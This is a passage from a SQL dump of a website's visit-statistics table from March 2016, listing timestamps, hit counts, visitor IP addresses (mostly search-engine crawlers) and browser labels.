'other'),(18113,1457602145,1,1,0,0,'141.8.142.88','other'),(18114,1457602146,1,1,0,0,'178.154.149.11','other'),(18115,1457602147,1,1,0,0,'5.255.253.100','other'),(18116,1457602389,1,1,0,0,'180.76.15.16','other'),(18117,1457602416,1,1,0,0,'217.69.133.220','other'),(18118,1457602542,2,2,0,0,'217.69.133.216','other'),(18119,1457602656,4,4,0,0,'141.8.184.18','other'),(18120,1457602702,1,1,0,0,'91.196.178.70','firefox'),(18121,1457603176,1,1,0,0,'93.158.152.9','other'),(18122,1457603295,4,4,0,0,'141.8.183.14','other'),(18123,1457603324,1,1,0,0,'178.154.149.11','other'),(18124,1457603418,1,1,0,0,'37.187.94.95','other'),(18125,1457603665,2,2,0,0,'141.8.184.18','other'),(18126,1457604078,1,0,1,0,'68.180.229.232',''),(18127,1457604093,1,1,0,0,'130.193.37.21','other'),(18128,1457604103,1,0,1,0,'66.249.66.166',''),(18129,1457604458,3,3,0,0,'130.193.51.45','other'),(18130,1457604496,1,1,0,0,'66.249.93.86','other'),(18131,1457604818,1,1,0,0,'80.254.155.43','chrome'),(18132,1457604820,1,1,0,0,'157.55.39.70','other'),(18133,1457604864,7,7,0,0,'93.158.152.9','other'),(18134,1457604957,3,3,0,0,'5.255.253.53','other'),(18135,1457604985,2,2,0,0,'141.8.132.99','other'),(18136,1457604988,2,2,0,0,'141.8.184.18','other'),(18137,1457604993,3,3,0,0,'178.154.149.11','other'),(18138,1457605054,4,4,0,0,'141.8.183.14','other'),(18139,1457605102,1,1,0,0,'109.68.41.128','msie'),(18140,1457605168,1,1,0,0,'91.196.178.69','firefox'),(18141,1457605279,1,0,1,0,'68.180.229.232',''),(18142,1457605360,1,1,0,0,'66.249.92.99','other'),(18143,1457605424,1,1,0,0,'130.193.37.21','other'),(18144,1457605523,4,4,0,0,'82.193.127.15','other'),(18145,1457605582,1,0,1,0,'66.249.66.158',''),(18146,1457605656,1,0,1,0,'66.249.66.190',''),(18147,1457605735,1,1,0,0,'37.187.94.124','other'),(18148,1457605740,1,1,0,0,'91.196.178.68','firefox'),(18149,1457605884,1,1,0,0,'51.255.65.43','other'),(18150,1457606058,1,1,0,0,'109.68.41.128','msie'),(18151,1457606106,4,4,0,0,'5.255.253.53','other'),(18152,1457606123,1,1,0,0,'51.255.65.22','other'),(18153,1457606186,2,0,2,0,'66.249.66.166',''),(18154,1457606336,1,1,0,0,'91.196.178.70','chrome'),(18155,1457606348,5,5,0,0,'141.8.184.18','other'),(18156,1457606396,4,4,0,0,'130.193.37.21','other'),(18157,1457606397,3,3,0,0,'141.8.183.14','other'),(18158,1457606456,2,2,0,0,'5.255.253.100','other'),(18159,1457606516,1,1,0,0,'37.53.90.175','firefox'),(18160,1457606549,6,6,0,0,'178.154.149.11','other'),(18161,1457606631,2,2,0,0,'46.211.2.248','other'),(18162,1457606652,2,2,0,0,'141.8.132.99','other'),(18163,1457606653,3,3,0,0,'93.158.152.9','other'),(18164,1457606719,1,1,0,0,'130.193.51.45','other'),(18165,1457606809,1,1,0,0,'217.69.133.68','other'),(18166,1457607056,3,3,0,0,'109.68.41.128','msie'),(18167,1457607074,1,1,0,0,'217.69.133.215','other'),(18169,1457607075,1,1,0,0,'217.69.133.84','other'),(18170,1457607173,1,1,0,0,'217.69.143.45','other'),(18171,1457607185,1,1,0,0,'217.69.143.44','other'),(18172,1457607189,1,1,0,0,'5.255.253.53','other'),(18173,1457607209,1,1,0,0,'37.187.95.187','other'),(18174,1457607357,3,3,0,0,'178.93.209.93','other'),(18175,1457607361,1,1,0,0,'217.69.133.222','other'),(18176,1457607677,1,1,0,0,'66.249.93.94','other'),(18177,1457607999,1,1,0,0,'217.69.133.216','other'),(18178,1457608007,1,0,1,0,'68.180.229.232',''),(18179,1457608547,1,1,0,0,'51.255.65.61','other'),(18180,1457608551,2,2,0,0,'217.69.133.224','other'),(18182,1457608646,1,1,0,0,'217.69.143.51','other'),(18183,1457608652,4,0,4,0,'66.249.66.158',''),(18184,1457608661,1,0,1,0,'66.249.66.162',''),(18185,1457608796,1,1,0,0,'176.106.213.5','chrome'),(18186,1457608835,1,1,0,0,'207.241.229.222','other'),(18187,1457609040,1,1,0,0,'51.255.65.66','other'),(18188,1457609393,1,1,0,0,'141.8.184.18','other'),(18189,1457609782,1,0,1,0,'68.180.229.232',''),(18190,1457610031,1,0,1,0,'66.249.66.158',''),(18191,1457610638,1,1,0,0,'217.69.133.84','other'),(18192,1457610991,1,0,1,0,'66.249.66.166',''),(18193,1457611071,1,1,0,0,'217.69.143.65','other'),(18194,1457611303,1,1,0,0,'66.249.93.86','other'),(18195,1457611461,1,1,0,0,'8.29.198.26','other'),(18196,1457611470,1,0,1,0,'66.249.66.158',''),(18197,1457611624,1,1,0,0,'217.69.133.217','other'),(18198,1457611674,2,2,0,0,'109.68.41.128','msie'),(18199,1457611702,1,0,1,0,'68.180.229.232',''),(18200,1457612051,1,1,0,0,'141.8.132.44','other'),(18201,1457612191,1,0,1,0,'66.249.66.162',''),(18202,1457612306,1,1,0,0,'217.69.133.68','other'),(18203,1457612487,1,1,0,0,'62.210.215.100','chrome'),(18204,1457612543,1,1,0,0,'37.187.95.44','other'),(18205,1457612696,1,1,0,0,'217.69.143.50','other'),(18206,1457612743,1,0,1,0,'66.249.66.158',''),(18207,1457612767,1,1,0,0,'217.69.143.65','other'),(18208,1457612781,1,1,0,0,'78.111.185.120','chrome'),(18209,1457612983,1,0,1,0,'66.249.66.133',''),(18210,1457613240,1,0,1,0,'68.180.229.232',''),(18211,1457613290,1,1,0,0,'51.255.65.45','other'),(18212,1457613364,1,1,0,0,'91.196.178.164','firefox'),(18213,1457613416,1,1,0,0,'207.46.13.161','other'),(18214,1457613425,1,1,0,0,'78.154.176.6','firefox'),(18215,1457613568,1,1,0,0,'91.196.178.70','chrome'),(18216,1457613679,1,1,0,0,'217.69.133.84','other'),(18217,1457613680,1,1,0,0,'217.69.133.85','other'),(18218,1457613740,1,0,1,0,'66.249.66.166',''),(18219,1457613904,2,2,0,0,'95.132.64.29','chrome'),(18220,1457613908,1,1,0,0,'91.196.178.67','chrome'),(18221,1457613915,1,1,0,0,'217.69.133.15','other'),(18222,1457614061,1,0,1,0,'66.249.66.158',''),(18223,1457614063,1,1,0,0,'66.249.66.158','other'),(18224,1457614281,1,1,0,0,'217.69.143.59','other'),(18225,1457614399,1,0,1,0,'66.249.66.162',''),(18226,1457614418,1,1,0,0,'217.69.133.222','other'),(18227,1457615066,1,1,0,0,'66.249.93.94','other'),(18228,1457615513,1,1,0,0,'217.69.143.69','other'),(18229,1457615968,1,0,1,0,'66.249.66.162',''),(18230,1457615993,1,1,0,0,'5.83.23.12','chrome'),(18231,1457616003,1,0,1,0,'66.249.66.166',''),(18232,1457616030,1,1,0,0,'66.249.92.99','other'),(18233,1457616168,1,1,0,0,'46.201.52.60','chrome'),(18234,1457616355,1,0,1,0,'66.249.66.158',''),(18235,1457616465,2,2,0,0,'217.69.133.216','other'),(18236,1457616790,1,1,0,0,'217.69.143.49','other'),(18237,1457616919,1,1,0,0,'5.83.23.12','chrome'),(18238,1457617215,1,1,0,0,'91.196.178.70','chrome'),(18239,1457617228,1,1,0,0,'92.113.127.205','chrome'),(18240,1457617263,1,1,0,0,'217.69.133.67','other'),(18241,1457617342,1,1,0,0,'37.187.95.158','other'),(18242,1457617501,2,0,2,0,'66.249.66.158',''),(18243,1457617532,1,0,1,0,'68.180.229.232',''),(18244,1457617656,1,1,0,0,'178.154.189.203','other'),(18245,1457618145,2,2,0,0,'217.69.133.84','other'),(18246,1457618174,1,1,0,0,'213.179.238.208','chrome'),(18247,1457618457,1,1,0,0,'66.249.93.94','other'),(18248,1457618605,1,1,0,0,'217.69.133.223','other'),(18249,1457618793,1,1,0,0,'51.255.65.38','other'),(18250,1457618865,1,0,1,0,'68.180.229.232',''),(18251,1457618887,1,0,1,0,'66.249.66.162',''),(18252,1457618888,1,1,0,0,'5.83.23.12','chrome'),(18253,1457618995,1,1,0,0,'51.255.65.57','other'),(18254,1457619065,1,1,0,0,'91.124.182.203','firefox'),(18255,1457619313,3,1,2,0,'66.249.66.166',''),(18256,1457619728,1,1,0,0,'95.133.24.248','chrome'),(18257,1457619855,2,2,0,0,'95.213.141.126','opera'),(18258,1457620065,1,1,0,0,'91.196.178.72','chrome'),(18259,1457620077,1,1,0,0,'5.83.23.12','chrome'),(18260,1457620625,1,1,0,0,'78.111.186.34','firefox'),(18261,1457620960,1,1,0,0,'217.69.143.60','other'),(18262,1457620962,1,1,0,0,'217.69.143.56','other'),(18263,1457621044,1,1,0,0,'146.120.24.251','chrome'),(18264,1457621072,1,1,0,0,'94.179.119.88','firefox'),(18265,1457621073,2,0,2,0,'66.249.66.166',''),(18266,1457621374,1,1,0,0,'51.255.65.45','other'),(18267,1457621603,1,0,1,0,'66.249.66.162',''),(18268,1457621787,1,1,0,0,'157.55.39.70','other'),(18269,1457621959,1,1,0,0,'37.53.90.175','firefox'),(18270,1457621992,1,1,0,0,'217.69.133.217','other'),(18271,1457622173,2,0,2,0,'68.180.229.232',''),(18272,1457622244,1,1,0,0,'66.249.93.86','other'),(18273,1457622383,1,1,0,0,'91.124.237.230','chrome'),(18274,1457622623,1,1,0,0,'141.8.184.18','other'),(18275,1457622748,1,1,0,0,'91.196.178.100','chrome'),(18276,1457623052,1,1,0,0,'8.29.198.26','other'),(18277,1457623141,3,0,3,0,'68.180.229.232',''),(18278,1457623244,1,0,1,0,'66.249.66.166',''),(18279,1457623935,1,1,0,0,'217.69.143.43','other'),(18280,1457624032,1,1,0,0,'217.69.133.221','other'),(18281,1457624068,1,0,1,0,'68.180.229.232',''),(18282,1457624089,1,1,0,0,'37.187.94.119','other'),(18283,1457624111,1,1,0,0,'37.187.95.38','other'),(18284,1457624254,1,1,0,0,'207.241.229.223','other'),(18285,1457624359,1,0,1,0,'66.249.66.162',''),(18286,1457624619,1,1,0,0,'178.154.189.204','other'),(18287,1457625674,1,1,0,0,'31.43.150.12','chrome'),(18288,1457625732,1,1,0,0,'217.69.133.220','other'),(18289,1457626074,1,1,0,0,'66.249.93.86','other'),(18290,1457626320,1,1,0,0,'51.255.65.25','other'),(18291,1457626351,1,1,0,0,'141.8.183.14','other'),(18292,1457626401,1,1,0,0,'130.193.37.21','other'),(18293,1457626980,1,1,0,0,'66.249.92.99','other'),(18294,1457627271,1,1,0,0,'130.193.51.85','other'),(18295,1457627359,1,0,1,0,'66.249.66.162',''),(18296,1457627535,2,1,1,0,'66.249.66.158',''),(18297,1457627543,1,1,0,0,'217.69.133.219','other'),(18298,1457627855,1,1,0,0,'217.69.133.216','other'),(18299,1457628245,2,1,1,0,'66.249.66.166',''),(18300,1457628283,1,1,0,0,'91.196.178.166','other'),(18301,1457628349,1,1,0,0,'217.69.133.218','other'),(18302,1457628439,4,0,4,0,'66.249.66.158',''),(18303,1457628872,1,1,0,0,'51.255.65.4','other'),(18304,1457629108,1,1,0,0,'217.69.133.222','other'),(18305,1457629240,1,1,0,0,'77.247.181.162','chrome'),(18306,1457629251,1,1,0,0,'5.83.23.12','chrome'),(18307,1457629271,1,1,0,0,'66.249.93.94','other'),(18308,1457629439,1,1,0,0,'37.187.94.201','other'),(18309,1457629654,1,1,0,0,'130.193.51.50','other'),(18310,1457629655,1,1,0,0,'51.255.65.31','other'),(18311,1457629771,1,1,0,0,'91.196.178.36','chrome'),(18312,1457629970,1,1,0,0,'51.255.65.43','other'),(18313,1457629984,1,1,0,0,'66.249.66.158','other'),(18314,1457630066,1,1,0,0,'178.93.148.72','chrome'),(18315,1457630522,1,1,0,0,'91.196.178.166','other'),(18316,1457630619,1,1,0,0,'217.69.133.85','other'),(18317,1457630888,1,1,0,0,'217.69.143.51','other'),(18318,1457630889,1,1,0,0,'217.69.143.42','other'),(18319,1457630917,1,1,0,0,'217.69.143.57','other'),(18320,1457630918,1,1,0,0,'217.69.143.61','other'),(18321,1457631024,1,1,0,0,'178.95.54.11','chrome'),(18322,1457631090,1,1,0,0,'91.196.178.70','opera'),(18323,1457631320,1,1,0,0,'66.102.9.104','chrome'),(18324,1457631323,1,1,0,0,'66.249.66.190','other'),(18325,1457631517,1,0,1,0,'66.249.66.166',''),(18326,1457631905,1,1,0,0,'66.249.66.158','other'),(18327,1457632219,1,1,0,0,'66.249.66.162','other'),(18328,1457632249,1,1,0,0,'217.69.143.63','other'),(18329,1457632281,1,1,0,0,'217.69.143.53','other'),(18330,1457632501,1,1,0,0,'141.8.132.48','other'),(18331,1457632543,1,1,0,0,'37.187.95.32','other'),(18332,1457632860,1,1,0,0,'66.249.93.90','other'),(18333,1457633063,1,1,0,0,'66.249.66.129','other'),(18334,1457633210,1,1,0,0,'37.187.95.200','other'),(18335,1457633314,1,1,0,0,'178.93.148.2','chrome'),(18336,1457633317,1,0,1,0,'66.249.66.166',''),(18337,1457633508,1,1,0,0,'66.249.66.162','other'),(18338,1457633642,2,1,1,0,'66.249.66.166',''),(18339,1457633884,1,1,0,0,'8.29.198.25','other'),(18340,1457634109,2,2,0,0,'217.69.133.218','other'),(18341,1457634598,1,1,0,0,'217.69.133.215','other'),(18342,1457634599,1,1,0,0,'217.69.133.67','other'),(18343,1457634620,1,1,0,0,'217.69.133.85','other'),(18344,1457634682,1,1,0,0,'94.179.102.90','firefox'),(18345,1457634788,1,1,0,0,'217.69.143.45','other'),(18346,1457634872,1,1,0,0,'37.187.94.117','other'),(18347,1457634906,1,0,1,0,'68.180.229.232',''),(18348,1457635013,1,1,0,0,'51.255.65.70','other'),(18349,1457635069,1,1,0,0,'66.249.66.162','other'),(18350,1457635109,1,1,0,0,'217.69.136.204','other'),(18351,1457635169,1,1,0,0,'217.69.133.221','other'),(18352,1457635170,1,1,0,0,'217.69.133.68','other'),(18353,1457635172,1,1,0,0,'217.69.133.224','other'),(18354,1457635173,1,1,0,0,'217.69.133.223','other'),(18355,1457635247,9,1,8,0,'66.249.66.158',''),(18356,1457635631,1,0,1,0,'66.249.66.129',''),(18357,1457635641,1,0,1,0,'66.249.66.190',''),(18358,1457635823,1,1,0,0,'178.154.189.204','other'),(18359,1457635997,1,1,0,0,'141.8.142.82','other'),(18360,1457636001,2,2,0,0,'5.255.253.9','other'),(18361,1457636005,1,1,0,0,'130.193.37.27','other'),(18362,1457636010,1,1,0,0,'130.193.51.22','other'),(18363,1457636013,1,1,0,0,'178.154.149.9','other'),(18364,1457636017,2,2,0,0,'93.158.152.81','other'),(18365,1457636022,1,1,0,0,'130.193.51.43','other'),(18366,1457636026,2,2,0,0,'5.255.253.10','other'),(18367,1457636030,2,2,0,0,'141.8.142.10','other'),(18368,1457636038,1,1,0,0,'141.8.142.8','other'),(18369,1457636042,1,1,0,0,'5.255.253.17','other'),(18370,1457636050,1,1,0,0,'141.8.132.2','other'),(18371,1457636062,1,1,0,0,'141.8.132.97','other'),(18372,1457636067,1,1,0,0,'130.193.51.102','other'),(18373,1457636072,1,1,0,0,'5.255.253.110','other'),(18374,1457636075,1,1,0,0,'5.255.253.55','other'),(18375,1457636184,3,3,0,0,'66.249.66.158','other'),(18376,1457636283,1,0,1,0,'66.249.66.166',''),(18377,1457636321,1,0,1,0,'66.249.66.162',''),(18378,1457636456,1,1,0,0,'66.249.93.90','other'),(18379,1457636471,1,1,0,0,'217.69.133.226','other'),(18380,1457636473,2,2,0,0,'217.69.133.225','other'),(18381,1457636474,1,1,0,0,'217.69.133.222','other'),(18382,1457636854,3,2,1,0,'66.249.66.129',''),(18383,1457636974,1,1,0,0,'207.241.229.222','other'),(18384,1457637184,1,1,0,0,'78.111.190.70','chrome'),(18385,1457637394,1,1,0,0,'217.69.133.248','other'),(18386,1457637641,2,0,2,0,'66.249.66.162',''),(18387,1457637669,2,0,2,0,'66.249.66.158',''),(18388,1457637770,1,1,0,0,'207.46.13.106','other'),(18389,1457638152,1,0,1,0,'66.249.66.166',''),(18390,1457638380,1,1,0,0,'66.249.92.95','other'),(18391,1457638415,1,1,0,0,'66.249.66.162','other'),(18392,1457638640,3,3,0,0,'66.249.66.158','other'),(18393,1457638772,1,1,0,0,'217.69.143.64','other'),(18394,1457638947,1,1,0,0,'37.187.94.139','other'),(18395,1457639098,1,1,0,0,'217.69.143.47','other'),(18396,1457639130,2,1,1,0,'66.249.66.166',''),(18397,1457639174,2,1,1,0,'66.249.66.190',''),(18398,1457639217,1,1,0,0,'37.187.94.52','other'),(18399,1457639406,1,1,0,0,'217.69.133.215','other'),(18400,1457639486,1,1,0,0,'66.249.66.133','other'),(18401,1457639544,1,0,1,0,'66.249.66.162',''),(18402,1457639584,1,0,1,0,'66.249.66.129',''),(18403,1457639757,1,1,0,0,'66.249.66.158','other'),(18404,1457639758,1,1,0,0,'217.69.133.217','other'),(18405,1457640221,1,1,0,0,'31.172.191.135','msie'),(18406,1457640227,1,1,0,0,'188.163.5.62','chrome'),(18407,1457640236,1,1,0,0,'217.69.133.84','other'),(18408,1457640237,1,1,0,0,'217.69.133.67','other'),(18409,1457640682,1,1,0,0,'217.69.133.68','other'),(18410,1457640962,1,1,0,0,'51.255.65.63','other'),(18411,1457640971,1,0,1,0,'68.180.229.232',''),(18412,1457641104,1,1,0,0,'51.255.65.89','other'),(18413,1457641269,2,2,0,0,'66.249.66.158','other'),(18414,1457641374,1,1,0,0,'51.255.65.16','other'),(18415,1457641688,1,0,1,0,'66.249.66.166',''),(18416,1457641759,1,1,0,0,'66.249.66.166','other'),(18417,1457641832,1,1,0,0,'51.255.65.93','other'),(18418,1457642304,1,1,0,0,'193.194.127.217','firefox'),(18419,1457642384,1,0,1,0,'68.180.229.232',''),(18420,1457642418,1,1,0,0,'37.187.94.176','other'),(18421,1457642666,1,0,1,0,'66.249.66.162',''),(18422,1457642713,2,2,0,0,'178.95.247.224','chrome'),(18423,1457643151,2,1,1,0,'66.249.66.162',''),(18424,1457643197,2,1,1,0,'66.249.66.158',''),(18425,1457643279,3,2,1,0,'66.249.66.162',''),(18426,1457643517,2,0,2,0,'66.249.66.166',''),(18427,1457643548,4,1,3,0,'66.249.66.158',''),(18428,1457643568,1,0,1,0,'66.249.66.133',''),(18429,1457643783,1,1,0,0,'66.249.93.90','other'),(18430,1457643789,6,6,0,0,'207.46.13.13','other'),(18431,1457643794,9,9,0,0,'207.46.13.106','other'),(18432,1457643803,7,7,0,0,'157.55.39.70','other'),(18433,1457643842,6,6,0,0,'157.55.39.101','other'),(18434,1457644026,1,1,0,0,'66.249.66.158','other'),(18435,1457644808,1,1,0,0,'37.187.95.192','other'),(18436,1457644842,1,1,0,0,'37.187.95.136','other'),(18437,1457644912,1,0,1,0,'68.180.229.232',''),(18438,1457644950,1,1,0,0,'8.29.198.26','other'),(18439,1457645077,1,1,0,0,'217.69.133.227','other'),(18440,1457645125,1,1,0,0,'217.69.133.215','other'),(18441,1457645126,1,1,0,0,'217.69.133.219','other'),(18442,1457645237,1,0,1,0,'66.249.66.166',''),(18443,1457645248,1,0,1,0,'66.249.66.129',''),(18444,1457645262,1,0,1,0,'66.249.66.162',''),(18445,1457645302,2,0,2,0,'66.249.66.158',''),(18446,1457645581,2,2,0,0,'66.249.66.162','other'),(18447,1457645924,1,1,0,0,'37.187.94.189','other'),(18448,1457646343,1,1,0,0,'217.69.143.65','other'),(18449,1457646410,1,1,0,0,'217.69.133.219','other'),(18450,1457646445,2,2,0,0,'217.69.133.222','other'),(18451,1457646446,1,1,0,0,'217.69.133.226','other'),(18452,1457646607,2,0,2,0,'66.249.66.166',''),(18453,1457646929,1,0,1,0,'66.249.66.133',''),(18454,1457646939,2,0,2,0,'66.249.66.162',''),(18455,1457647009,9,0,9,0,'66.249.66.158',''),(18456,1457647255,1,1,0,0,'66.249.93.90','other'),(18457,1457647281,2,0,2,0,'68.180.229.232',''),(18458,1457647356,2,2,0,0,'217.69.133.224','other'),(18459,1457647526,1,1,0,0,'217.69.133.68','other'),(18460,1457647707,1,1,0,0,'217.69.133.84','other'),(18461,1457648278,1,1,0,0,'51.255.65.58','other'),(18462,1457648584,1,0,1,0,'66.249.66.166',''),(18463,1457648644,1,1,0,0,'37.187.94.63','other'),(18464,1457648810,1,1,0,0,'66.249.92.99','other'),(18465,1457649081,1,1,0,0,'37.187.95.109','other'),(18466,1457649262,1,1,0,0,'66.249.66.158','other'),(18467,1457649274,3,3,0,0,'178.154.149.11','other'),(18468,1457649281,2,2,0,0,'93.158.152.9','other'),(18469,1457649646,9,9,0,0,'141.8.184.18','other'),(18470,1457649754,2,2,0,0,'217.69.133.84','other'),(18471,1457649828,1,1,0,0,'51.255.65.17','other'),(18472,1457649927,1,1,0,0,'66.249.66.162','other'),(18473,1457650087,9,9,0,0,'130.193.37.21','other'),(18474,1457650111,1,0,1,0,'66.249.66.166',''),(18475,1457650127,1,0,1,0,'68.180.229.232',''),(18476,1457650177,4,4,0,0,'141.8.132.99','other'),(18477,1457650183,11,11,0,0,'141.8.183.14','other'),(18478,1457650188,8,8,0,0,'178.154.149.11','other'),(18479,1457650197,13,13,0,0,'5.255.253.53','other'),(18480,1457650281,1,1,0,0,'66.249.66.166','other'),(18481,1457650322,8,8,0,0,'93.158.152.9','other'),(18482,1457650340,1,0,1,0,'66.249.66.158',''),(18483,1457650578,11,11,0,0,'141.8.184.18','other'),(18484,1457650617,2,2,0,0,'130.193.51.45','other'),(18485,1457650653,2,2,0,0,'5.255.253.100','other'),(18486,1457650688,2,2,0,0,'100.43.85.22','other'),(18487,1457650705,1,1,0,0,'91.196.178.168','chrome'),(18488,1457650977,1,1,0,0,'66.249.93.90','other'),(18489,1457651011,1,1,0,0,'51.255.65.24','other'),(18490,1457651102,2,0,2,0,'68.180.229.232',''),(18491,1457651196,4,4,0,0,'141.8.183.14','other'),(18492,1457651500,9,9,0,0,'178.154.149.11','other'),(18493,1457651501,4,4,0,0,'5.255.253.53','other'),(18494,1457651506,12,12,0,0,'141.8.184.18','other'),(18495,1457651585,3,3,0,0,'93.158.152.9','other'),(18496,1457651635,2,2,0,0,'5.255.253.100','other'),(18497,1457651872,6,6,0,0,'130.193.37.21','other'),(18498,1457651912,8,8,0,0,'141.8.132.99','other'),(18499,1457651913,3,3,0,0,'130.193.51.45','other'),(18500,1457651985,1,0,1,0,'66.249.66.162',''),(18501,1457652343,1,1,0,0,'182.118.21.247','msie'),(18502,1457652382,1,1,0,0,'217.69.133.224','other'),(18503,1457652436,13,13,0,0,'141.8.184.18','other'),(18504,1457652478,9,9,0,0,'5.255.253.53','other'),(18505,1457652490,10,10,0,0,'93.158.152.9','other'),(18506,1457652495,10,10,0,0,'178.154.149.11','other'),(18507,1457652503,8,8,0,0,'141.8.183.14','other'),(18508,1457652586,1,1,0,0,'101.226.168.200','chrome'),(18509,1457652672,4,4,0,0,'5.255.253.100','other'),(18510,1457652938,3,0,3,0,'68.180.229.232',''),(18511,1457653085,2,0,2,0,'66.249.66.166',''),(18512,1457653758,2,0,2,0,'66.249.66.158',''),(18513,1457654781,2,0,2,0,'68.180.229.232',''),(18514,1457654878,2,0,2,0,'66.249.66.158',''),(18515,1457654960,1,1,0,0,'5.255.253.53','other'),(18516,1457655238,1,1,0,0,'207.46.13.106','other'),(18517,1457655589,1,1,0,0,'217.69.133.217','other'),(18518,1457655757,2,2,0,0,'82.193.127.15','other'),(18519,1457655820,1,1,0,0,'8.29.198.26','other'),(18520,1457655941,1,1,0,0,'51.255.65.26','other'),(18521,1457656021,1,0,1,0,'66.249.66.166',''),(18522,1457656211,1,1,0,0,'217.69.133.218','other'),(18523,1457656537,2,0,2,0,'66.249.66.158',''),(18524,1457656641,1,1,0,0,'217.69.133.84','other'),(18525,1457656736,2,0,2,0,'66.249.66.190',''),(18526,1457656777,1,0,1,0,'68.180.229.232',''),(18527,1457657001,1,0,1,0,'66.249.66.129',''),(18528,1457657295,2,0,2,0,'66.249.66.166',''),(18529,1457657430,1,0,1,0,'66.249.66.162',''),(18530,1457657637,1,1,0,0,'217.69.133.223','other'),(18531,1457657665,3,0,3,0,'66.249.66.158',''),(18532,1457657724,1,0,1,0,'66.249.66.190',''),(18533,1457658166,1,1,0,0,'180.76.15.163','other'),(18534,1457658370,1,1,0,0,'51.255.65.34','other'),(18535,1457658396,1,0,1,0,'66.249.66.166',''),(18536,1457658469,2,0,2,0,'66.249.66.162',''),(18537,1457658544,1,0,1,0,'68.180.229.232',''),(18538,1457658843,1,0,1,0,'66.249.66.190',''),(18539,1457658875,2,2,0,0,'217.69.133.67','other'),(18540,1457659092,1,1,0,0,'66.249.92.95','other'),(18541,1457659154,2,0,2,0,'66.249.66.158',''),(18542,1457659372,1,1,0,0,'217.69.133.225','other'),(18543,1457659694,3,0,3,0,'66.249.66.166',''),(18544,1457659786,4,0,4,0,'66.249.66.162',''),(18545,1457659892,1,1,0,0,'51.255.65.53','other'),(18546,1457660072,10,0,10,0,'66.249.66.158',''),(18547,1457660712,1,0,1,0,'66.249.66.129',''),(18548,1457660946,2,0,2,0,'66.249.66.162',''),(18549,1457661346,1,1,0,0,'62.210.215.100','chrome'),(18550,1457661722,1,0,1,0,'66.249.66.133',''),(18551,1457662471,3,3,0,0,'66.249.66.162','other'),(18552,1457662487,1,1,0,0,'66.249.66.133','other'),(18553,1457662505,4,4,0,0,'66.249.66.190','other'),(18554,1457662546,5,5,0,0,'66.249.66.158','other'),(18555,1457662599,1,1,0,0,'66.249.66.166','other'),(18556,1457663405,2,0,2,0,'68.180.229.232',''),(18557,1457663870,1,1,0,0,'62.210.215.100','chrome'),(18558,1457663900,1,0,1,0,'66.249.66.162',''),(18559,1457664169,1,1,0,0,'180.76.15.161','other'),(18560,1457664170,1,1,0,0,'180.76.15.156','other'),(18561,1457664502,4,0,4,0,'66.249.66.158',''),(18562,1457664660,1,1,0,0,'51.255.65.40','other'),(18563,1457664858,1,1,0,0,'51.255.65.34','other'),(18564,1457664883,1,1,0,0,'51.255.65.33','other'),(18565,1457665182,3,0,3,0,'66.249.66.162',''),(18566,1457665311,1,0,1,0,'66.249.66.166',''),(18567,1457665385,1,1,0,0,'51.255.65.58','other'),(18568,1457665740,1,0,1,0,'66.249.66.129',''),(18569,1457666027,4,0,4,0,'66.249.66.158',''),(18570,1457666045,1,1,0,0,'207.46.13.106','other'),(18571,1457666078,4,4,0,0,'141.8.184.18','other'),(18572,1457666079,3,3,0,0,'178.154.149.11','other'),(18573,1457666083,3,3,0,0,'141.8.183.14','other'),(18574,1457666087,2,2,0,0,'5.255.253.100','other'),(18575,1457666088,2,2,0,0,'5.255.253.53','other'),(18576,1457666090,1,1,0,0,'130.193.37.21','other'),(18577,1457666136,1,1,0,0,'93.158.152.9','other'),(18578,1457666639,1,1,0,0,'8.29.198.26','other'),(18579,1457666834,1,0,1,0,'66.249.66.133',''),(18580,1457666951,1,0,1,0,'68.180.229.232',''),(18581,1457667404,1,1,0,0,'217.69.133.67','other'),(18582,1457667424,2,2,0,0,'217.69.133.217','other'),(18583,1457667428,1,1,0,0,'217.69.133.219','other'),(18584,1457667472,1,1,0,0,'217.69.133.84','other'),(18585,1457668119,1,1,0,0,'180.76.15.6','other'),(18586,1457668150,2,0,2,0,'66.249.66.162',''),(18587,1457668229,2,0,2,0,'66.249.66.166',''),(18588,1457668517,2,2,0,0,'141.8.183.14','other'),(18589,1457668518,3,3,0,0,'178.154.149.11','other'),(18590,1457668520,1,1,0,0,'5.255.253.53','other'),(18591,1457668524,1,1,0,0,'93.158.152.9','other'),(18592,1457668525,1,1,0,0,'130.193.37.21','other'),(18593,1457668645,204,204,0,0,'94.154.239.69','other'),(18594,1457668691,1,0,1,0,'66.249.66.129',''),(18595,1457668726,2,2,0,0,'141.8.184.18','other'),(18596,1457668779,1,0,1,0,'66.249.66.190',''),(18597,1457668841,2,0,2,0,'68.180.229.232',''),(18598,1457669284,1,1,0,0,'66.249.66.158','other'),(18599,1457669450,1,1,0,0,'66.249.92.95','other'),(18600,1457669546,2,2,0,0,'94.154.239.69','other'),(18601,1457670493,1,0,1,0,'66.249.66.166',''),(18602,1457670655,1,1,0,0,'37.187.94.207','other'),(18603,1457670762,1,1,0,0,'51.255.65.77','other'),(18604,1457670935,1,0,1,0,'68.180.229.232',''),(18605,1457671584,3,1,2,0,'66.249.66.162',''),(18606,1457671740,3,3,0,0,'178.154.149.11','other'),(18607,1457671741,4,4,0,0,'141.8.184.18','other'),(18608,1457671743,1,1,0,0,'141.8.183.14','other'),(18609,1457672646,2,1,1,0,'66.249.66.158',''),(18610,1457673084,2,2,0,0,'217.69.133.222','other'),(18611,1457673114,2,2,0,0,'217.69.133.215','other'),(18612,1457673115,1,1,0,0,'217.69.133.216','other'),(18613,1457673244,2,2,0,0,'217.69.133.218','other'),(18614,1457673310,1,1,0,0,'66.249.66.166','other'),(18615,1457673331,2,2,0,0,'217.69.133.217','other'),(18616,1457673332,1,1,0,0,'217.69.133.67','other'),(18617,1457673404,1,1,0,0,'37.187.94.136','other'),(18618,1457673944,4,2,2,0,'66.249.66.158',''),(18619,1457674422,3,2,1,0,'66.249.66.162',''),(18620,1457674816,2,1,1,0,'66.249.66.166',''),(18621,1457675113,3,3,0,0,'66.249.66.166','other'),(18622,1457675209,2,1,1,0,'66.249.66.158',''),(18623,1457675490,3,3,0,0,'66.249.66.162','other'),(18624,1457675825,11,11,0,0,'178.154.149.11','other'),(18625,1457675841,20,20,0,0,'141.8.184.18','other'),(18626,1457675985,7,7,0,0,'141.8.183.14','other'),(18627,1457675986,3,3,0,0,'93.158.152.9','other'),(18628,1457675987,2,2,0,0,'5.255.253.53','other'),(18629,1457676243,3,3,0,0,'157.55.39.101','other'),(18630,1457676254,8,8,0,0,'207.46.13.106','other'),(18631,1457676261,2,2,0,0,'207.46.13.13','other'),(18632,1457676269,2,2,0,0,'66.249.66.158','other'),